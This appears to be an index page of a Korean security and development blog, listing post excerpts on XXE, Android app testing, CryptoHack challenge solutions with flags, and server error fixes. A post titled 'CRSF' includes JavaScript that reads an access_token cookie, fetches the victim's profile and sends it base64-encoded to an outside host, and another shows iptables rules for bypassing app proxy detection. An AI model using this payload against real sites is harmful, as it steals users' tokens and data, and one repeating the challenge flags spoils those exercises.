728x90 반응형 분류 전체보기396 "Scanner State 24 not Recognized" while trying XXE 출처1 : https://github.com/mozilla/rhino/issues/479 A potential XXE vulnerability found on rhino · Issue #479 · mozilla/rhino Howdy, Just found a potential XXE vulnerability on rhino as show below, it seems function toXml didn't add any protection from XXE vulnerability when parsing XML document. https://github.com/mo... github.com 출처2 : https://stackoverflow.com/questions/47169234/what-is-org-xml.. 2022. 4. 6. how to solve "waiting for debugger" on android 안드로이드 앱 검수 도중 아래와 같은 에러 메시지가 출력되며, 앱이 정상적으로 실행되지 않는 현상이 발생함. 해결책은 간단한데, adb shell am clear-debug-app 명령어 실행하면 됨. . 2022. 4. 6. [CryptoHack] ASCII 주어진 숫자열을 아스키코드 표에 대입해서 문자로 바꿔주면 끝 flag: crypto{ASCII_pr1nt4bl3} 2022. 3. 25. [CryptoHack] Great Snakes Modern cryptography involves code, and code involves coding. CryptoHack provides a good opportunity to sharpen your skills. Of all modern programming languages, Python 3 stands out as ideal for quickly writing cryptographic scripts and attacks. For more information about why we think Python is so great for this, please see the FAQ. Run the attached Python script and it will output your flag. gre.. 2022. 3. 25. [CryptoHack] Finding Flags flag 포맷을 알려주는 문제. 그냥 문제 본문에 쓰여있는 flag를 입력하면 끝. flag: crypto{y0ur_f1rst_fl4g} 2022. 3. 25. [CryptoHack] register 가입부터 조금 특이함 카이사르 암호를 풀어야 가입이 됨 아래 사이트에서 "URQQP GODCTM VQFFNGT UGC"을 입력해주면 끝. https://www.boxentriq.com/code-breaking/caesar-cipher Caesar Cipher Decoder (online tool) | Boxentriq This is a complete guide to the Caesar cipher and the tools you need to decode it. Learn about its famous history and where it is still in use today, or use the Caesar Cipher tool to solve it automatically. www.boxentri.. 2022. 3. 25. CRSF 1. fetch 이용하기 var auth = document.cookie.match('(^|;) ?access_token=([^;]*)(;|$)')[2] fetch('/mobile-api/rest/api/v1/mobile/me/profile/',{ headers: { Authorization: 'Bearer ' + auth } }).then(a=>a.text()).then(a=>{location='http://jkns.kr/fsi.php?a='+(btoa(encodeURIComponent(a)))})2. XHR 이용하기 const xhr = new XMLHttpRequest(); xhr.open("GET", "http://jkns.kr/test.h.. 2022. 3. 10. how to bypass proxy detection in Android 모바일 앱을 검수하다보면 종종 프록시 탐지 기능을 우회해야할 경우가 생긴다. 프록시 탐지 함수를 후킹하여 우회하거나 iptables를 설정하는 방식으로 쉽게 프록시 탐지 기능을 우회할 수 있다. 1. iptables 룰 등록 iptables -t nat -A OUTPUT -p tcp -j DNAT --to-destination 192.168.79.8:8080 2. iptables 룰 확인 iptables -t nat -L 3. 검수 종료 후 iptables 룰 제거 iptables -t nat -D OUTPUT 1 이때 버프슈트를 이용할 경우 "Support invisible porxying" 기능을 ON 해야하는데 이 옵션은 "Proxy > Options > Proxy Liseners > Edit or.. 2022. 2. 16. Android Packet Debugging using Proxy tools 1. 모바일 기기와 분석용 pc가 같은 네트워크에 있어야 함. 2. 모바일 네트워크 프록시 세팅 모바일 네트워크 설정에서 분석용 pc로 프록시 세팅 3. 버프슈트나 피들러 등 분석 툴 세팅 끝. P.S. HTTPS도 보고자 한다면 https://burp나 https://:8888 등에서 자기가 사용하는 점검 도구의 인증서를 모바일 기기에 설치하면 됨. 2022. 2. 16. APK 분석 툴 리스트 1. ClassyShark https://github.com/google/android-classyshark GitHub - google/android-classyshark: Android and Java bytecode viewer Android and Java bytecode viewer. Contribute to google/android-classyshark development by creating an account on GitHub. github.com 2. jadx https://github.com/skylot/jadx GitHub - skylot/jadx: Dex to Java decompiler Dex to Java decompiler. Contribute to skylot/jadx d.. 2022. 2. 16. how to solve "upstream prematurely closed connection" error flask, uwsgi, nginx 연동 도중 아래와 502 Bad Gateway 에러가 발생. 우선 /var/log/nginx/error.log를 확인했는데, 2022/02/12 00:49:54 [error] 1458540#1458540: *7 upstream prematurely closed connection while reading response header from upstream, client: 1.1.1.1, server: xxx.kr, request: "GET / HTTP/1.1", upstream: "uwsgi://unix:/tmp/uwsgi.sock:", host: "xxx.kr:80" 이런 에러 로그가 있었다. 삽질 끝에 해결책을 발견했는데, sudo apt install uwsgi.. 2022. 2. 12. how to fix pip3 error : ImportError: cannot import name 'PackageFinder' from 'pip._internal.index' Traceback (most recent call last): File "/Library/Developer/CommandLineTools/usr/bin/pip3", line 6, in from pip.\_internal import main File "/Library/Developer/CommandLineTools/Library/Frameworks/Python3.framework/Versions/3.8/lib/python3.8/site-packages/pip/\_internal/\_\_init\_\_.py", line 40, in from pip.\_internal.cli.autocompletion import autocomplete File "/Library/Developer/CommandLineToo.. 2022. 1. 30. 이전 1 2 3 4 5 6 7 8 ··· 33 다음 728x90 반응형
